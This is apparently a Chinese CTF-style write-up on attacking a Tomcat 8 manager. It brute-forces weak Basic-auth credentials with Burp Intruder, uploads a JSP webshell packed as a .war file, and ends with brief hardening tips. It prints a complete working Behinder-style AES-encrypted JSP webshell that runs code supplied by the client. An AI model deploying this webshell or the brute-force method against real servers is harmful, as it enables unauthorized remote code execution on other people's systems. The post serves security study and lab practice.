tomcat8弱口令&&后台getshell

好哥哥的云服务器搭的tomcat8
已经知道

弱口令
影响版本:全版本
影响说明:读取webapp下的所有文件
环境说明:Tomcat 8.0

Tomcat manager 登录界面存在弱口令漏洞,登录成功后有上传点,压缩包 xxx.war.war不会被解析,直接访问 xxx/里面的一句话路径,可直接拿到shell

Tomcat的目录结构
bin-----存放Tomcat的脚本文件,例如启动、关闭
conf----Tomcat的配置文件,例如server.xml和web.xml
lib-----存放Tomcat运行需要的库文件(JAR包)
logs----存放Tomcat执行时的LOG文件
temp----存放Tomcat运行时所产生的临时文件
webapps-Web发布目录,默认情况下把Web应用文件放于此目录
work----存放jsp编译后产生的class文件
里面一些重要的文件,需要了解其作用:
server.xml:配置tomcat启动的端口号、host主机、Context等
web.xml文件:部署描述文件,这个web.xml中描述了一些默认的servlet,部署每个webapp时,都会调用这个文件,配置该web应用的默认servlet
tomcat-users.xml:tomcat的用户密码与权限。

tomcat8弱口令&&后台getshell_第1张图片
这里是弱口令爆破
抓包上bp,看了一眼是

id:passwd

的形式 还有base64的编码
tomcat8弱口令&&后台getshell_第2张图片

选择用Custom iterator拼接密码进行爆破
tomcat8弱口令&&后台getshell_第3张图片
playload1 是用户名playload2是冒号
playload3是密码字典
tomcat8弱口令&&后台getshell_第4张图片
tomcat8弱口令&&后台getshell_第5张图片

还要记得进行base64编码
取消url编码
tomcat8弱口令&&后台getshell_第6张图片

最后得到密码
进入后台的manager/html
tomcat8弱口令&&后台getshell_第7张图片
看到文件上传点
将带有一句话的shell.jsp小马压缩成zip,并且将压缩后的zip文件改名为hhh.war
这里分别上传了一个大马一个小马 上传后 都是下图的OK
在这里插入图片描述

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

小马这里直接冰蝎链接

tomcat8弱口令&&后台getshell_第8张图片

浏览根目录得到flag
tomcat8弱口令&&后台getshell_第9张图片
通过tomcat-users.xml还能设置用户名密码 用户权限之类的参数
tomcat8弱口令&&后台getshell_第10张图片

大马上传方式相同
上传成功后则可直接访问/234/233.jsp
!tomcat8弱口令&&后台getshell_第11张图片
也是找到了flag

漏洞防止:
1.后台管理避免弱口令,改账号密码
2.修改权限

"tomcat" password="tomcat" roles="manager-gui"/>

去掉roles属性里的manager,然后重启tomcat
3.可以选择放弃使用manager功能或者在manager的配置文件contex.xml中设置白名单来限制访问manager,这样非信任的IP访问都会403 access denied

附上
tomcat漏洞总结

你可能感兴趣的:(渗透,tomcat,java)